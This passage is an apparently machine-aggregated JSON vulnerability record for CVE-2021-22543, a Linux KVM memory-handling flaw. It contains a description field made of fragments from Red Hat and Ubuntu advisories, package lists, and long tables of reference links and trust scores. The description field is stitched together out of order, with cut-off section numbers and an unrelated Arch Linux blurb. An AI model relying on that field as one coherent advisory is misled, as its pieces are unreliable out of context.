"id": "CVE-2021-22543",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"description": {
"_id": null,
"data": "An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. Linux Kernel Is vulnerable to a buffer error.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Arch Linux is an application system of Arch open source. A lightweight and flexible Linux\u00ae distribution that tries to keep it simple. (BZ#2010171)\n\n4. \nThese packages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n\nBug Fix(es):\n\n* Rebase package(s) to version: 1.2.23\n\nHighlights, important fixes, or notable enhancements: \n\n* imgbase should not copy the selinux binary policy file (BZ# 1979624)\n(BZ#1989397)\n\n* RHV-H has been rebased on Red Hat Enterprise Linux 8.4 Batch #2. \n(BZ#1975177)\n\n4. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.4.z source tree\n(BZ#1985050)\n\n* kernel-rt: Merge mm/memcg: Fix kmem_cache_alloc() performance regression\n(BZ#1987102)\n\n4. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* [Regression] RHEL8.2 - ISST-LTE:pVM:diapvmlp83:sum:memory DLPAR fails to\nadd memory on multiple trials[mm/memory_hotplug.c:1163] (mm-) (BZ#1930169)\n\n* Every server is displaying the same power levels for all of our i40e 25G\ninterfaces. 10G interfaces seem to be correct. 
Ethtool version is 5.0\n(BZ#1967100)\n\n* s390/uv: Fix handling of length extensions (BZ#1975657)\n\n* RHEL 8.3 using FCOE via a FastLinQ QL45000 card will not manually scan in\nLUN from Target_id\u0027s over 8 (BZ#1976265)\n\n* Backport \"tick/nohz: Conditionally restart tick on idle exit\" to RHEL 8.5\n(BZ#1978711)\n\n* rhel8.3: phase 2 netfilter backports from upstream (BZ#1980323)\n\n* xfrm: backports from upstream (BZ#1981841)\n\nEnhancement(s):\n\n* [8.2.z] Incorrect parsing of ACPI HMAT table reports incorrect kernel\nWARNING taint (BZ#1943702)\n\n* Only selected patches from [IBM 8.4 FEAT] ibmvnic: Backport FW950 and\nassorted bug fixes (BZ#1980795)\n\n4. ==========================================================================\nUbuntu Security Notice USN-5071-3\nSeptember 22, 2021\n\nlinux-raspi, linux-raspi-5.4 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-raspi: Linux kernel for Raspberry Pi (V8) systems\n- linux-raspi-5.4: Linux kernel for Raspberry Pi (V8) systems\n\nDetails:\n\nIt was discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform reference counting in some situations,\nleading to a use-after-free vulnerability. An attacker who could start and\ncontrol a VM could possibly use this to expose sensitive information or\nexecute arbitrary code. (CVE-2021-22543)\n\nMurray McAllister discovered that the joystick device interface in the\nLinux kernel did not properly validate data passed via an ioctl(). A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code on systems with a joystick device\nregistered. 
(CVE-2021-3612)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n linux-image-5.4.0-1043-raspi 5.4.0-1043.47\n linux-image-raspi 5.4.0.1043.78\n linux-image-raspi2 5.4.0.1043.78\n\nUbuntu 18.04 LTS:\n linux-image-5.4.0-1043-raspi 5.4.0-1043.47~18.04.1\n linux-image-raspi-hwe-18.04 5.4.0.1043.46\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7.7) - ppc64le, x86_64\n\n3. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel security and bug fix update\nAdvisory ID: RHSA-2021:3987-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:3987\nIssue date: 2021-10-26\nCVE Names: CVE-2019-20934 CVE-2020-36385 CVE-2021-3653 \n CVE-2021-3656 CVE-2021-22543 CVE-2021-37576 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.7\nAdvanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.7 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. 
A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.6) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nBug Fix(es):\n\n* A race between i40e_ndo_set_vf_mac() and i40e_vsi_clear() in the i40e\ndriver causes a use after free condition of the kmalloc-4096 slab cache. \n(BZ#1980333)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 
7.7):\n\nSource:\nkernel-3.10.0-1062.59.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.59.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.59.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 
7.7):\n\nSource:\nkernel-3.10.0-1062.59.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.59.1.el7.noarch.rpm\n\nppc64le:\nbpftool-3.10.0-1062.59.1.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1062.59.1.el7.ppc64le.rpm\nperf-3.10.0-1062.59.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\npython-perf-3.10.0-1062.59.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-3.10.0-1062.59.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 
7.7):\n\nSource:\nkernel-3.10.0-1062.59.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.59.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.59.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 
7.6):\n\nppc64le:\nbpftool-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1062.59.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. 
References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-20934\nhttps://access.redhat.com/security/cve/CVE-2020-36385\nhttps://access.redhat.com/security/cve/CVE-2021-3653\nhttps://access.redhat.com/security/cve/CVE-2021-3656\nhttps://access.redhat.com/security/cve/CVE-2021-22543\nhttps://access.redhat.com/security/cve/CVE-2021-37576\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYXew09zjgjWX9erEAQh/NRAAlpTOJdaVIZiu4IJtVrtRh2JGkgTlL2Pi\nKIpqyIeBFsUwRh0pg9GE10q4NRk/DqMYTXvc2GJaNUZlRbzEhLxZXKqksfea6kmo\nwwGdORkerZrbE8QYF/FRC/6Bxi99lvoH0rSEeJeX0bM6vVwu9ubp7Xbdp4hmq08S\n1VsG5ftGK6hQJPyxVDgPIHK1FHE5dVz1puyM10eY5NgabKCdD8oCC9/OL1hxFjAv\nADTfFombilFItZoYa9rQdpoQ7s5CBZ1H6VbA+d9CvUltfzRzr6EUflL/rM3af3s1\nPTSGqTSqdAZRoebwFvqKlHSoK2B7Wrinxs0kIGbvf3S2MbGklfzb6GaB4QZZ490T\nWRuTiJZTvMP0jqQyW0nTCMbxfqo3NgKbQt2wQSGYYDlwq65vhuuQAghGVPEoBPhS\nT9inwoSthoj7uxni1E58TXwPhzfEPXSTAkEZvu05BLt1AXRA+RrNH/B7VIHx30oX\nfkdz6MFeO/SWIb/CWf5YQVD3Xfsk+9rg2JWGWjnAE2WV9lhsVqhlidL36uaL6kmA\nLGrb/ZQcsVIPIM+HQRme15MBsg3GervoIHWkWOPbXvU4fYHxID2YkLMZQ6vtGHE2\nDHe1+11yo2WKvdWB5nrbsIDBYBJLKT12DxsbycCeH2rLS7qDsfw/XDshAaFnPXZM\nG9cg8fFnilE=\n=hTrt\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22543"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "PACKETSTORM",
"id": "164565"
},
{
"db": "PACKETSTORM",
"id": "163926"
},
{
"db": "PACKETSTORM",
"id": "163770"
},
{
"db": "PACKETSTORM",
"id": "164469"
},
{
"db": "PACKETSTORM",
"id": "163995"
},
{
"db": "PACKETSTORM",
"id": "164237"
},
{
"db": "PACKETSTORM",
"id": "164666"
},
{
"db": "PACKETSTORM",
"id": "164652"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-22543",
"trust": 4.2
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/06/26/1",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "164666",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164589",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167858",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164583",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163995",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164237",
"trust": 0.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/26/3",
"trust": 0.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/26/4",
"trust": 0.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/26/5",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3485",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3324",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3034",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3626",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2959",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3372",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2764",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3536",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3173",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3554",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4163",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3249",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3389",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3015",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2899",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4156",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2691",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3137",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4282",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3456",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4089",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3499",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2789",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164331",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "163865",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164098",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164562",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164076",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164223",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164431",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164186",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164028",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164484",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "163767",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164477",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021082206",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021083123",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021111726",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072069",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021102111",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021090126",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021101336",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022020931",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021100618",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164652",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-380980",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-22543",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164565",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163926",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163770",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164469",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "PACKETSTORM",
"id": "164565"
},
{
"db": "PACKETSTORM",
"id": "163926"
},
{
"db": "PACKETSTORM",
"id": "163770"
},
{
"db": "PACKETSTORM",
"id": "164469"
},
{
"db": "PACKETSTORM",
"id": "163995"
},
{
"db": "PACKETSTORM",
"id": "164237"
},
{
"db": "PACKETSTORM",
"id": "164666"
},
{
"db": "PACKETSTORM",
"id": "164652"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"id": "VAR-202105-1451",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T23:33:59.314000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Linux\u00a0Kernel\u00a0Archives NetApp\u00a0Advisory",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html"
},
{
"title": "Red Hat: Important: kernel security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225640 - Security Advisory"
},
{
"title": "Red Hat: CVE-2021-22543",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-22543"
},
{
"title": "Amazon Linux 2: ALAS2-2021-1699",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1699"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-22543 log"
},
{
"title": "Amazon Linux AMI: ALAS-2021-1539",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2021-1539"
},
{
"title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-004",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2KERNEL-5.4-2022-004"
},
{
"title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-002",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2KERNEL-5.10-2022-002"
},
{
"title": "CVE-2021-22543",
"trust": 0.1,
"url": "https://github.com/JamesGeeee/CVE-2021-22543 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
},
{
"problemtype": "Buffer error (CWE-119) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22543"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20210708-0002/"
},
{
"trust": 1.8,
"url": "https://github.com/google/security-research/security/advisories/ghsa-7wq5-phmq-m584"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00012.html"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2021/06/26/1"
},
{
"trust": 1.4,
"url": "https://access.redhat.com/security/cve/cve-2021-22543"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4g5ybuvephzyxmkngbz3s6infcteel4e/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/roqixqb7zawi3ksgshr6h5rduwzi775s/"
},
{
"trust": 0.8,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/roqixqb7zawi3ksgshr6h5rduwzi775s/"
},
{
"trust": 0.8,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4g5ybuvephzyxmkngbz3s6infcteel4e/"
},
{
"trust": 0.7,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.6,
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/5"
},
{
"trust": 0.6,
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/3"
},
{
"trust": 0.6,
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/4"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2899"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3034"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021090126"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4089"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3554"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4282"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4163"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021083123"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164431/ubuntu-security-notice-usn-5106-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2789"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021111726"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164484/red-hat-security-advisory-2021-3802-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3485"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164098/ubuntu-security-notice-usn-5070-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164186/ubuntu-security-notice-usn-5071-2.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3324"
},
{
"trust": 0.6,
